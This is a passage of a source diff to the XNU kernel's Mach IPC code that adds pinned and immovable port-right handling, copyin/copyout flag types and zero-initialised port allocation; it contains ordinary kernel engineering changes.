+               assert(entry->ie_object == IO_NULL);
+
+               entry->ie_object = object;
+       }
+
        kr = ipc_right_copyout(space, name, entry,
-           msgt_name, context, guard_flags, object);
+           msgt_name, flags, context, guard_flags, object);
 
        /* object is unlocked */
        is_write_unlock(space);
 
+out:
        if (kr == KERN_SUCCESS) {
                *namep = name;
+       } else if (IO_VALID(object)) {
+               ipc_object_destroy(object, msgt_name);
        }
+
        return kr;
 }
 
@@ -1035,6 +1042,7 @@ ipc_object_copyout_name(
        mach_msg_type_name_t    msgt_name,
        mach_port_name_t        name)
 {
+       ipc_port_t port = ip_object_to_port(object);
        mach_port_name_t oname;
        ipc_entry_t oentry;
        ipc_entry_t entry;
@@ -1054,52 +1062,48 @@ ipc_object_copyout_name(
        }
        /* space is write-locked and active */
 
+       io_lock(object);
+
+       /*
+        * Don't actually copyout rights we aren't allowed to
+        *
+        * In particular, kolabel-ed objects do not allow callers
+        * to pick the name they end up with.
+        */
+       if (!io_active(object) || ip_is_kolabeled(port)) {
+               io_unlock(object);
+               if (!ipc_right_inuse(entry)) {
+                       ipc_entry_dealloc(space, name, entry);
+               }
+               is_write_unlock(space);
+               return KERN_INVALID_CAPABILITY;
+       }
+
+       /* space is write-locked and active, object is locked and active */
+
        if ((msgt_name != MACH_MSG_TYPE_PORT_SEND_ONCE) &&
            ipc_right_reverse(space, object, &oname, &oentry)) {
-               /* object is locked and active */
-
                if (name != oname) {
                        io_unlock(object);
-
-                       if (IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_NONE) {
+                       if (!ipc_right_inuse(entry)) {
                                ipc_entry_dealloc(space, name, entry);
                        }
-
                        is_write_unlock(space);
                        return KERN_RIGHT_EXISTS;
                }
 
                assert(entry == oentry);
                assert(entry->ie_bits & MACH_PORT_TYPE_SEND_RECEIVE);
+       } else if (ipc_right_inuse(entry)) {
+               io_unlock(object);
+               is_write_unlock(space);
+               return KERN_NAME_EXISTS;
        } else {
-               if (ipc_right_inuse(space, name, entry)) {
-                       return KERN_NAME_EXISTS;
-               }
-
-               assert(IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_NONE);
                assert(entry->ie_object == IO_NULL);
 
-               io_lock(object);
-               if (!io_active(object)) {
-                       io_unlock(object);
-                       ipc_entry_dealloc(space, name, entry);
-                       is_write_unlock(space);
-                       return KERN_INVALID_CAPABILITY;
-               }
-
-               /* Don't actually copyout rights we aren't allowed to */
-               if (!ip_label_check(space, ip_object_to_port(object), msgt_name)) {
-                       io_unlock(object);
-                       ipc_entry_dealloc(space, name, entry);
-                       is_write_unlock(space);
-                       return KERN_INVALID_CAPABILITY;
-               }
-
                entry->ie_object = object;
        }
 
-       /* space is write-locked and active, object is locked and active */
-
 #if IMPORTANCE_INHERITANCE
        /*
         * We are slamming a receive right into the space, without
@@ -1108,8 +1112,6 @@ ipc_object_copyout_name(
         * port has assertions (and the task wants them).
         */
        if (msgt_name == MACH_MSG_TYPE_PORT_RECEIVE) {
-               ipc_port_t port = ip_object_to_port(object);
-
                if (space->is_task != TASK_NULL) {
                        task_imp = space->is_task->task_imp_base;
                        if (ipc_importance_task_is_any_receiver_type(task_imp)) {
@@ -1128,7 +1130,7 @@ ipc_object_copyout_name(
 #endif /* IMPORTANCE_INHERITANCE */
 
        kr = ipc_right_copyout(space, name, entry,
-           msgt_name, NULL, NULL, object);
+           msgt_name, IPC_OBJECT_COPYOUT_FLAGS_NONE, NULL, NULL, object);
 
        /* object is unlocked */
        is_write_unlock(space);
index 83021dd24f5675ba01395959d892257214e21cff..d67867f325fa742f2ab94746b9b9f031a8978b47 100644 (file)
@@ -85,6 +85,20 @@ typedef natural_t ipc_object_refs_t;    /* for ipc/ipc_object.h              */
 typedef natural_t ipc_object_bits_t;
 typedef natural_t ipc_object_type_t;
 
+__options_closed_decl(ipc_object_copyout_flags_t, uint32_t, {
+       IPC_OBJECT_COPYOUT_FLAGS_NONE                 = 0x0,
+       IPC_OBJECT_COPYOUT_FLAGS_PINNED               = 0x1,
+       IPC_OBJECT_COPYOUT_FLAGS_NO_LABEL_CHECK       = 0x2,
+});
+
+__options_closed_decl(ipc_object_copyin_flags_t, uint32_t, {
+       IPC_OBJECT_COPYIN_FLAGS_NONE                     = 0x0,
+       IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND     = 0x1, /* Dest port contains an immovable send right */
+       IPC_OBJECT_COPYIN_FLAGS_SOFT_FAIL_IMMOVABLE_SEND = 0x2, /* Silently fail copyin without guard exception */
+       IPC_OBJECT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE     = 0x4,
+       IPC_OBJECT_COPYIN_FLAGS_DEADOK                   = 0x8,
+});
+
 /*
  * The ipc_object is used to both tag and reference count these two data
  * structures, and (Noto Bene!) pointers to either of these or the
@@ -156,8 +170,11 @@ struct ipc_object_header {
 extern zone_t ipc_object_zones[IOT_NUMBER];
 extern lck_grp_t        ipc_lck_grp;
 
-#define io_alloc(otype)         \
-               ((ipc_object_t) zalloc(ipc_object_zones[(otype)]))
+static inline ipc_object_t
+io_alloc(unsigned int otype, zalloc_flags_t flags)
+{
+       return zalloc_flags(ipc_object_zones[otype], flags);
+}
 
 extern void     io_free(
        unsigned int    otype,
@@ -333,7 +350,7 @@ extern kern_return_t ipc_object_copyin(
        ipc_object_t            *objectp,
        mach_port_context_t     context,
        mach_msg_guard_flags_t  *guard_flags,
-       uint16_t                kmsg_flags);
+       ipc_object_copyin_flags_t copyin_flags);
 
 /* Copyin a naked capability from the kernel */
 extern void ipc_object_copyin_from_kernel(
@@ -361,6 +378,7 @@ extern kern_return_t ipc_object_copyout(
        ipc_space_t             space,
        ipc_object_t            object,
        mach_msg_type_name_t    msgt_name,
+       ipc_object_copyout_flags_t flags,
        mach_port_context_t     *context,
        mach_msg_guard_flags_t  *guard_flags,
        mach_port_name_t        *namep);
index 2aa10cceb2a90fcf09c76db56b9dbbc4e54fd30a..2b7c9217ca75050241a10d47ece164b46a1f0a6f 100644 (file)
@@ -83,6 +83,7 @@
 #include <ipc/ipc_entry.h>
 #include <ipc/ipc_space.h>
 #include <ipc/ipc_object.h>
+#include <ipc/ipc_right.h>
 #include <ipc/ipc_port.h>
 #include <ipc/ipc_pset.h>
 #include <ipc/ipc_kmsg.h>
@@ -641,6 +642,8 @@ ipc_port_clear_receiver(
  *     Purpose:
  *             Initializes a newly-allocated port.
  *             Doesn't touch the ip_object fields.
+ *
+ *             The memory is expected to be zero initialized (allocated with Z_ZERO).
  */
 
 void
@@ -655,46 +658,23 @@ ipc_port_init(
        port->ip_receiver = space;
        port->ip_receiver_name = name;
 
-       port->ip_mscount = 0;
-       port->ip_srights = 0;
-       port->ip_sorights = 0;
        if (flags & IPC_PORT_INIT_MAKE_SEND_RIGHT) {
                port->ip_srights = 1;
                port->ip_mscount = 1;
        }
 
-       port->ip_nsrequest = IP_NULL;
-       port->ip_pdrequest = IP_NULL;
-       port->ip_requests = IPR_NULL;
-
-       port->ip_premsg = IKM_NULL;
-       port->ip_context = 0;
-       port->ip_reply_context = 0;
-
-       port->ip_sprequests  = 0;
-       port->ip_spimportant = 0;
-       port->ip_impdonation = 0;
-       port->ip_tempowner   = 0;
-
-       port->ip_guarded      = 0;
-       port->ip_strict_guard = 0;
-       port->ip_immovable_receive = 0;
-       port->ip_no_grant    = 0;
-       port->ip_immovable_send = 0;
-       port->ip_impcount    = 0;
-
        if (flags & IPC_PORT_INIT_FILTER_MESSAGE) {
                port->ip_object.io_bits |= IP_BIT_FILTER_MSG;
        }
 
        port->ip_tg_block_tracking = (flags & IPC_PORT_INIT_TG_BLOCK_TRACKING) != 0;
-       port->ip_specialreply = (flags & IPC_PORT_INIT_SPECIAL_REPLY) != 0;
-       port->ip_sync_link_state = PORT_SYNC_LINK_ANY;
-       port->ip_sync_bootstrap_checkin = 0;
 
-       ipc_special_reply_port_bits_reset(port);
+       if (flags & IPC_PORT_INIT_SPECIAL_REPLY) {
+               port->ip_specialreply = true;
+               port->ip_immovable_receive = true;
+       }
 
-       port->ip_send_turnstile = TURNSTILE_NULL;
+       port->ip_sync_link_state = PORT_SYNC_LINK_ANY;
 
        ipc_mqueue_kind_t kind = IPC_MQUEUE_KIND_NONE;
        if (flags & IPC_PORT_INIT_MESSAGE_QUEUE) {
@@ -1537,7 +1517,7 @@ ipc_port_send_update_inheritor(
        struct knote *kn;
        turnstile_update_flags_t inheritor_flags = TURNSTILE_INHERITOR_TURNSTILE;
 
-       assert(imq_held(mqueue));
+       imq_held(mqueue);
 
        if (!ip_active(port)) {
                /* this port is no longer active, it should not push anywhere */
@@ -2325,6 +2305,42 @@ ipc_port_get_watchport_inheritor(
        return ipc_port_watchport_elem(port)->twe_task->watchports->tw_thread;
 }
 
+/*
+ *     Routine:        ipc_port_get_receiver_task
+ *     Purpose:
+ *             Returns receiver task pointer and its pid (if any) for port.
+ *
+ *     Conditions:
+ *             Nothing locked.
+ */
+pid_t
+ipc_port_get_receiver_task(ipc_port_t port, uintptr_t *task)
+{
+       task_t receiver = TASK_NULL;
+       pid_t pid = -1;
+
+       if (!port) {
+               goto out;
+       }
+
+       ip_lock(port);
+       if (ip_active(port) &&
+           MACH_PORT_VALID(port->ip_receiver_name) &&
+           port->ip_receiver &&
+           port->ip_receiver != ipc_space_kernel &&
+           port->ip_receiver != ipc_space_reply) {
+               receiver = port->ip_receiver->is_task;
+               pid = task_pid(receiver);
+       }
+       ip_unlock(port);
+
+out:
+       if (task) {
+               *task = (uintptr_t)receiver;
+       }
+       return pid;
+}
+
 /*
  *     Routine:        ipc_port_impcount_delta
  *     Purpose:
@@ -2688,10 +2704,11 @@ ipc_port_copy_send(
  *             Nothing locked.
  */
 
-mach_port_name_t
-ipc_port_copyout_send(
+static mach_port_name_t
+ipc_port_copyout_send_internal(
        ipc_port_t      sright,
-       ipc_space_t     space)
+       ipc_space_t     space,
+       ipc_object_copyout_flags_t flags)
 {
        mach_port_name_t name;
 
@@ -2699,10 +2716,8 @@ ipc_port_copyout_send(
                kern_return_t kr;
 
                kr = ipc_object_copyout(space, ip_to_object(sright),
-                   MACH_MSG_TYPE_PORT_SEND, NULL, NULL, &name);
+                   MACH_MSG_TYPE_PORT_SEND, flags, NULL, NULL, &name);
                if (kr != KERN_SUCCESS) {
-                       ipc_port_release_send(sright);
-
                        if (kr == KERN_INVALID_CAPABILITY) {
                                name = MACH_PORT_DEAD;
                        } else {
@@ -2716,28 +2731,38 @@ ipc_port_copyout_send(
        return name;
 }
 
+mach_port_name_t
+ipc_port_copyout_send(
+       ipc_port_t      sright,
+       ipc_space_t     space)
+{
+       return ipc_port_copyout_send_internal(sright, space, IPC_OBJECT_COPYOUT_FLAGS_NONE);
+}
+
+mach_port_name_t
+ipc_port_copyout_send_pinned(
+       ipc_port_t      sright,
+       ipc_space_t     space)
+{
+       return ipc_port_copyout_send_internal(sright, space, IPC_OBJECT_COPYOUT_FLAGS_PINNED);
+}
+
 /*
- *     Routine:        ipc_port_release_send
+ *     Routine:        ipc_port_release_send_and_unlock
  *     Purpose:
  *             Release a naked send right.
  *             Consumes a ref for the port.
  *     Conditions:
- *             Nothing locked.
+ *             Port is valid and locked on entry
+ *             Port is unlocked on exit.
  */
-
 void
-ipc_port_release_send(
+ipc_port_release_send_and_unlock(
        ipc_port_t      port)
 {
        ipc_port_t nsrequest = IP_NULL;
        mach_port_mscount_t mscount;
 
-       if (!IP_VALID(port)) {
-               return;
-       }
-
-       ip_lock(port);
-
        assert(port->ip_srights > 0);
        if (port->ip_srights == 0) {
                panic("Over-release of port %p send right!", port);
@@ -2765,6 +2790,25 @@ ipc_port_release_send(
        }
 }
 
+/*
+ *     Routine:        ipc_port_release_send
+ *     Purpose:
+ *             Release a naked send right.
+ *             Consumes a ref for the port.
+ *     Conditions:
+ *             Nothing locked.
+ */
+
+void
+ipc_port_release_send(
+       ipc_port_t      port)
+{
+       if (IP_VALID(port)) {
+               ip_lock(port);
+               ipc_port_release_send_and_unlock(port);
+       }
+}
+
 /*
  *     Routine:        ipc_port_make_sonce_locked
  *     Purpose:
@@ -2895,17 +2939,16 @@ ipc_port_alloc_special(
 {
        ipc_port_t port;
 
-       port = ip_object_to_port(io_alloc(IOT_PORT));
+       port = ip_object_to_port(io_alloc(IOT_PORT, Z_WAITOK | Z_ZERO));
        if (port == IP_NULL) {
                return IP_NULL;
        }
 
-#if     MACH_ASSERT
+#if MACH_ASSERT
        uintptr_t buf[IP_CALLSTACK_MAX];
        ipc_port_callstack_init_debug(&buf[0], IP_CALLSTACK_MAX);
 #endif /* MACH_ASSERT */
 
-       bzero((char *)port, sizeof(*port));
        io_lock_init(ip_to_object(port));
        port->ip_references = 1;
        port->ip_object.io_bits = io_makebits(TRUE, IOT_PORT, 0);
index 2784c3c732286974201f17c594f5ceddd33fbd60..5dfcabe5f8f6f5f9e05cc78460865ddcb2c4ea38 100644 (file)
@@ -141,8 +141,9 @@ struct ipc_port {
        struct ipc_port *ip_pdrequest;
        struct ipc_port_request *ip_requests;
        union {
-               struct ipc_kmsg *premsg;
+               struct ipc_kmsg *XNU_PTRAUTH_SIGNED_PTR("ipc_port.premsg") premsg;
                struct turnstile *send_turnstile;
+               ipc_port_t XNU_PTRAUTH_SIGNED_PTR("ipc_port.alt_port") alt_port;
        } kdata2;
 
        mach_vm_address_t ip_context;
@@ -160,7 +161,8 @@ struct ipc_port {
            ip_no_grant:1,              /* Port wont accept complex messages containing (ool) port descriptors */
            ip_immovable_send:1,        /* No send(once) rights to this port can be moved out of a space */
            ip_tg_block_tracking:1,     /* Track blocking relationship between thread groups during sync IPC */
-           ip_impcount:17;             /* number of importance donations in nested queue */
+           ip_pinned: 1,               /* Can't deallocate the last send right from a space while the bit is set */
+           ip_impcount:16;             /* number of importance donations in nested queue */
 
        mach_port_mscount_t ip_mscount;
        mach_port_rights_t ip_srights;
@@ -201,6 +203,7 @@ struct ipc_port {
 
 #define ip_premsg               kdata2.premsg
 #define ip_send_turnstile       kdata2.send_turnstile
+#define ip_alt_port             kdata2.alt_port
 
 #define port_send_turnstile(port)       (IP_PREALLOC(port) ? (port)->ip_premsg->ikm_turnstile : (port)->ip_send_turnstile)
 
@@ -284,10 +287,10 @@ MACRO_END
 
 #define ip_kotype(port)         io_kotype(ip_to_object(port))
 #define ip_is_kobject(port)     io_is_kobject(ip_to_object(port))
+#define ip_is_control(port) \
+       (ip_is_kobject(port) && (ip_kotype(port) == IKOT_TASK_CONTROL || ip_kotype(port) == IKOT_THREAD_CONTROL))
 #define ip_is_kolabeled(port)   io_is_kolabeled(ip_to_object(port))
 #define ip_get_kobject(port)    ipc_kobject_get(port)
-#define ip_label_check(space, port, msgt_name) \
-       (!ip_is_kolabeled(port) || ipc_kobject_label_check((space), (port), (msgt_name)))
 
 #define ip_full_kernel(port)    imq_full_kernel(&(port)->ip_messages)
 #define ip_full(port)           imq_full(&(port)->ip_messages)
@@ -678,11 +681,17 @@ extern mach_port_name_t ipc_port_copyout_send(
        ipc_port_t      sright,
        ipc_space_t     space);
 
+extern mach_port_name_t ipc_port_copyout_send_pinned(
+       ipc_port_t      sright,
+       ipc_space_t     space);
+
 extern void ipc_port_thread_group_blocked(
        ipc_port_t      port);
 
 extern void ipc_port_thread_group_unblocked(void);
 
+extern void ipc_port_release_send_and_unlock(
+       ipc_port_t      port);
 #endif /* MACH_KERNEL_PRIVATE */
 
 #if KERNEL_PRIVATE
@@ -717,10 +726,13 @@ extern void ipc_port_release_sonce(
 extern void ipc_port_release_receive(
        ipc_port_t      port);
 
-/* finalize the destruction of a port before it gets freed */
+/* Finalize the destruction of a port before it gets freed */
 extern void ipc_port_finalize(
        ipc_port_t      port);
 
+/* Get receiver task and its pid (if any) for port. */
+extern pid_t ipc_port_get_receiver_task(ipc_port_t port, uintptr_t *task);
+
 /* Allocate a port in a special space */
 extern ipc_port_t ipc_port_alloc_special(
        ipc_space_t             space,
index 7f247520f768f559507ee2086dd67d4c4d179eb6..3af85d1dfb9b5faf961af53713ecb2c3d790a73c 100644 (file)
@@ -176,13 +176,11 @@ ipc_pset_alloc_special(
        assert(space->is_table == IE_NULL);
        assert(!is_active(space));
 
-       pset = ips_object_to_pset(io_alloc(IOT_PORT_SET));
+       pset = ips_object_to_pset(io_alloc(IOT_PORT_SET, Z_WAITOK | Z_ZERO));
        if (pset == IPS_NULL) {
                return IPS_NULL;
        }
 
-       bzero((char *)pset, sizeof(*pset));
-
        io_lock_init(ips_to_object(pset));
        pset->ips_references = 1;
        pset->ips_object.io_bits = io_makebits(TRUE, IOT_PORT_SET, 0);
@@ -991,7 +989,7 @@ filt_machportevent(struct knote *kn, long hint __assert_only)
        int result = 0;
 
        /* mqueue locked by caller */
-       assert(imq_held(mqueue));
+       imq_held(mqueue);
        assert(hint != NOTE_REVOKE);
        if (imq_is_valid(mqueue)) {
                assert(!imq_is_set(mqueue));
index 78fd32c6e7fafd277e834b918f72f0a0d5c29d43..49ce9226865347ab4cd77be10ffe06fded04972e 100644 (file)
@@ -182,13 +182,13 @@ ipc_right_lookup_two_write(
  *             Translate (space, object) -> (name, entry).
  *             Only finds send/receive rights.
  *             Returns TRUE if an entry is found; if so,
- *             the object is locked and active.
+ *             the object active.
  *     Conditions:
  *             The space must be locked (read or write) and active.
- *             Nothing else locked.
+ *             The port is locked and active
  */
 
-boolean_t
+bool
 ipc_right_reverse(
        ipc_space_t             space,
        ipc_object_t            object,
@@ -205,13 +205,9 @@ ipc_right_reverse(
        assert(io_otype(object) == IOT_PORT);
 
        port = ip_object_to_port(object);
+       require_ip_active(port);
 
-       ip_lock(port);
-       if (!ip_active(port)) {
-               ip_unlock(port);
-
-               return FALSE;
-       }
+       ip_lock_held(port);
 
        if (port->ip_receiver == space) {
                name = port->ip_receiver_name;
@@ -225,7 +221,7 @@ ipc_right_reverse(
 
                *namep = name;
                *entryp = entry;
-               return TRUE;
+               return true;
        }
 
        if (ipc_hash_lookup(space, ip_to_object(port), namep, entryp)) {
@@ -233,11 +229,10 @@ ipc_right_reverse(
                assert(IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_SEND);
                assert(port == ip_object_to_port(entry->ie_object));
 
-               return TRUE;
+               return true;
        }
 
-       ip_unlock(port);
-       return FALSE;
+       return false;
 }
 
 /*
@@ -304,7 +299,7 @@ ipc_right_request_alloc(
                        port = ip_object_to_port(entry->ie_object);
                        assert(port != IP_NULL);
 
-                       if (!ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) {
+                       if (!ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) {
                                /* port is locked and active */
 
                                /* if no new request, just cancel previous */
@@ -468,27 +463,20 @@ ipc_right_request_cancel(
  *             Returns TRUE if it is.
  *     Conditions:
  *             The space is write-locked and active.
- *             It is unlocked if the entry is inuse.
  */
 
-boolean_t
+bool
 ipc_right_inuse(
-       ipc_space_t                     space,
-       __unused mach_port_name_t       name,
-       ipc_entry_t                     entry)
+       ipc_entry_t entry)
 {
-       if (IE_BITS_TYPE(entry->ie_bits) != MACH_PORT_TYPE_NONE) {
-               is_write_unlock(space);
-               return TRUE;
-       }
-       return FALSE;
+       return IE_BITS_TYPE(entry->ie_bits) != MACH_PORT_TYPE_NONE;
 }
 
 /*
  *     Routine:        ipc_right_check
  *     Purpose:
  *             Check if the port has died.  If it has,
- *              and IPC_RIGHT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE is not
+ *              and IPC_OBJECT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE is not
  *              passed and it is not a send once right then
  *             clean up the entry and return TRUE.
  *     Conditions:
@@ -506,7 +494,7 @@ ipc_right_check(
        ipc_port_t               port,
        mach_port_name_t         name,
        ipc_entry_t              entry,
-       ipc_right_copyin_flags_t flags)
+       ipc_object_copyin_flags_t flags)
 {
        ipc_entry_bits_t bits;
 
@@ -515,7 +503,7 @@ ipc_right_check(
 
        ip_lock(port);
        if (ip_active(port) ||
-           ((flags & IPC_RIGHT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE) &&
+           ((flags & IPC_OBJECT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE) &&
            entry->ie_request == IE_REQ_NONE &&
            (entry->ie_bits & MACH_PORT_TYPE_SEND_ONCE))) {
                return FALSE;
@@ -861,6 +849,7 @@ ipc_right_destroy(
  *     Returns:
  *             KERN_SUCCESS            A user ref was released.
  *             KERN_INVALID_RIGHT      Entry has wrong type.
+ *      KERN_INVALID_CAPABILITY  Deallocating a pinned right.
  */
 
 kern_return_t
@@ -933,7 +922,7 @@ dead_name:
                port = ip_object_to_port(entry->ie_object);
                assert(port != IP_NULL);
 
-               if (ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) {
+               if (ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) {
                        bits = entry->ie_bits;
                        assert(IE_BITS_TYPE(bits) == MACH_PORT_TYPE_DEAD_NAME);
                        goto dead_name;     /* it will release port */
@@ -976,7 +965,7 @@ dead_name:
                port = ip_object_to_port(entry->ie_object);
                assert(port != IP_NULL);
 
-               if (ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) {
+               if (ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) {
                        bits = entry->ie_bits;
                        assert(IE_BITS_TYPE(bits) == MACH_PORT_TYPE_DEAD_NAME);
                        goto dead_name;     /* it will release port */
@@ -986,6 +975,14 @@ dead_name:
                assert(port->ip_srights > 0);
 
                if (IE_BITS_UREFS(bits) == 1) {
+                       if (pinned_control_port_enabled && port->ip_pinned != 0) {
+                               ip_unlock(port);
+                               is_write_unlock(space);
+                               mach_port_guard_exception(name, 0, MPG_FLAGS_MOD_REFS_PINNED_DEALLOC,
+                                   ipc_control_port_options & IPC_CONTROL_PORT_OPTIONS_PINNED_HARD ?
+                                   kGUARD_EXC_MOD_REFS : kGUARD_EXC_MOD_REFS_NON_FATAL);
+                               return KERN_INVALID_CAPABILITY;
+                       }
                        if (--port->ip_srights == 0) {
                                nsrequest = port->ip_nsrequest;
                                if (nsrequest != IP_NULL) {
@@ -1087,6 +1084,7 @@ dead_name:
  *             KERN_SUCCESS            Count was modified.
  *             KERN_INVALID_RIGHT      Entry has wrong type.
  *             KERN_INVALID_VALUE      Bad delta for the right.
+ *             KERN_INVALID_CAPABILITY Deallocating a pinned right.
  */
 
 kern_return_t
@@ -1268,7 +1266,7 @@ ipc_right_delta(
                port = ip_object_to_port(entry->ie_object);
                assert(port != IP_NULL);
 
-               if (ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) {
+               if (ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) {
                        assert(!(entry->ie_bits & MACH_PORT_TYPE_SEND_ONCE));
                        mach_port_guard_exception(name, 0, 0, kGUARD_EXC_INVALID_RIGHT);
                        goto invalid_right;
@@ -1318,7 +1316,7 @@ ipc_right_delta(
                        port = ip_object_to_port(entry->ie_object);
                        assert(port != IP_NULL);
 
-                       if (!ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) {
+                       if (!ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) {
                                /* port is locked and active */
                                ip_unlock(port);
                                port = IP_NULL;
@@ -1408,7 +1406,7 @@ ipc_right_delta(
                port = ip_object_to_port(entry->ie_object);
                assert(port != IP_NULL);
 
-               if (ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) {
+               if (ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) {
                        assert((entry->ie_bits & MACH_PORT_TYPE_SEND) == 0);
                        goto invalid_right;
                }
@@ -1445,6 +1443,11 @@ ipc_right_delta(
                }
 
                if ((urefs + delta) == 0) {
+                       if (pinned_control_port_enabled && port->ip_pinned != 0) {
+                               ip_unlock(port);
+                               goto pinned_right;
+                       }
+
                        if (--port->ip_srights == 0) {
                                nsrequest = port->ip_nsrequest;
                                if (nsrequest != IP_NULL) {
@@ -1523,6 +1526,15 @@ invalid_right:
        }
        return KERN_INVALID_RIGHT;
 
+pinned_right:
+       assert(pinned_control_port_enabled);
+
+       is_write_unlock(space);
+       mach_port_guard_exception(name, 0, MPG_FLAGS_MOD_REFS_PINNED_DEALLOC,
+           ipc_control_port_options & IPC_CONTROL_PORT_OPTIONS_PINNED_HARD ?
+           kGUARD_EXC_MOD_REFS : kGUARD_EXC_MOD_REFS_NON_FATAL);
+       return KERN_INVALID_CAPABILITY;
+
 invalid_value:
        is_write_unlock(space);
        mach_port_guard_exception(name, 0, 0, kGUARD_EXC_INVALID_VALUE);
@@ -1772,7 +1784,7 @@ ipc_right_info(
                 * types while we still have it locked.  Otherwise,
                 * recapture the (now dead) bits.
                 */
-               if (!ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) {
+               if (!ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) {
                        if (request != IE_REQ_NONE) {
                                type |= ipc_port_request_type(port, name, request);
                        }
@@ -1864,8 +1876,10 @@ ipc_right_copyin_check_reply(
                 * be read without a lock.
                 */
                if (reply_port->ip_immovable_send) {
-                       mach_port_guard_exception(reply_name, 0, 0, kGUARD_EXC_IMMOVABLE);
-                       return FALSE;
+                       if (!ip_is_control(reply_port) || immovable_control_port_enabled) {
+                               mach_port_guard_exception_immovable(reply_name, reply_port, MPG_FLAGS_NONE);
+                               return FALSE;
+                       }
                }
 
                if (reply_type == MACH_MSG_TYPE_MOVE_SEND_ONCE) {
@@ -1943,7 +1957,8 @@ ipc_right_copyin_check_guard_locked(
  *     Returns:
  *             KERN_SUCCESS            Acquired an object, possibly IO_DEAD.
  *             KERN_INVALID_RIGHT      Name doesn't denote correct right.
- *             KERN_INVALID_CAPABILITY Trying to move an kobject port or an immovable right
+ *             KERN_INVALID_CAPABILITY Trying to move an kobject port or an immovable right,
+ *                                                             or moving the last ref of pinned right
  *             KERN_INVALID_ARGUMENT   Port is unguarded or guard mismatch
  */
 
@@ -1953,7 +1968,7 @@ ipc_right_copyin(
        mach_port_name_t           name,
        ipc_entry_t                entry,
        mach_msg_type_name_t       msgt_name,
-       ipc_right_copyin_flags_t   flags,
+       ipc_object_copyin_flags_t   flags,
        ipc_object_t               *objectp,
        ipc_port_t                 *sorightp,
        ipc_port_t                 *releasep,
@@ -1964,8 +1979,9 @@ ipc_right_copyin(
        ipc_entry_bits_t bits;
        ipc_port_t port;
        kern_return_t kr;
-       boolean_t deadok = flags & IPC_RIGHT_COPYIN_FLAGS_DEADOK? TRUE : FALSE;
-       boolean_t allow_imm_send = flags & IPC_RIGHT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND? TRUE : FALSE;
+       boolean_t deadok = !!(flags & IPC_OBJECT_COPYIN_FLAGS_DEADOK);
+       boolean_t allow_imm_send = !!(flags & IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND);
+       boolean_t soft_fail_imm_send = !!(flags & IPC_OBJECT_COPYIN_FLAGS_SOFT_FAIL_IMMOVABLE_SEND);
 
        *releasep = IP_NULL;
        *assertcntp = 0;
@@ -2136,7 +2152,7 @@ ipc_right_copyin(
                port = ip_object_to_port(entry->ie_object);
                assert(port != IP_NULL);
 
-               if (ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) {
+               if (ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) {
                        bits = entry->ie_bits;
                        *releasep = port;
                        goto copy_dead;
@@ -2152,9 +2168,13 @@ ipc_right_copyin(
                }
 
                if (!allow_imm_send && port->ip_immovable_send) {
-                       ip_unlock(port);
-                       mach_port_guard_exception(name, 0, 0, kGUARD_EXC_IMMOVABLE);
-                       return KERN_INVALID_CAPABILITY;
+                       if (!ip_is_control(port) || immovable_control_port_enabled) {
+                               ip_unlock(port);
+                               if (!soft_fail_imm_send) {
+                                       mach_port_guard_exception_immovable(name, port, MPG_FLAGS_NONE);
+                               }
+                               return KERN_INVALID_CAPABILITY;
+                       }
                }
 
                ipc_port_copy_send_locked(port);
@@ -2183,7 +2203,7 @@ ipc_right_copyin(
                port = ip_object_to_port(entry->ie_object);
                assert(port != IP_NULL);
 
-               if (ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) {
+               if (ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) {
                        bits = entry->ie_bits;
                        *releasep = port;
                        goto move_dead;
@@ -2193,15 +2213,18 @@ ipc_right_copyin(
                if ((bits & MACH_PORT_TYPE_SEND) == 0) {
                        assert(IE_BITS_TYPE(bits) == MACH_PORT_TYPE_SEND_ONCE);
                        assert(port->ip_sorights > 0);
-
                        ip_unlock(port);
                        goto invalid_right;
                }
 
                if (!allow_imm_send && port->ip_immovable_send) {
-                       ip_unlock(port);
-                       mach_port_guard_exception(name, 0, 0, kGUARD_EXC_IMMOVABLE);
-                       return KERN_INVALID_CAPABILITY;
+                       if (!ip_is_control(port) || immovable_control_port_enabled) {
+                               ip_unlock(port);
+                               if (!soft_fail_imm_send) {
+                                       mach_port_guard_exception_immovable(name, port, MPG_FLAGS_NONE);
+                               }
+                               return KERN_INVALID_CAPABILITY;
+                       }
                }
 
                if (IE_BITS_UREFS(bits) == 1) {
@@ -2211,6 +2234,7 @@ ipc_right_copyin(
                                assert(port->ip_receiver == space);
                                assert(IE_BITS_TYPE(bits) ==
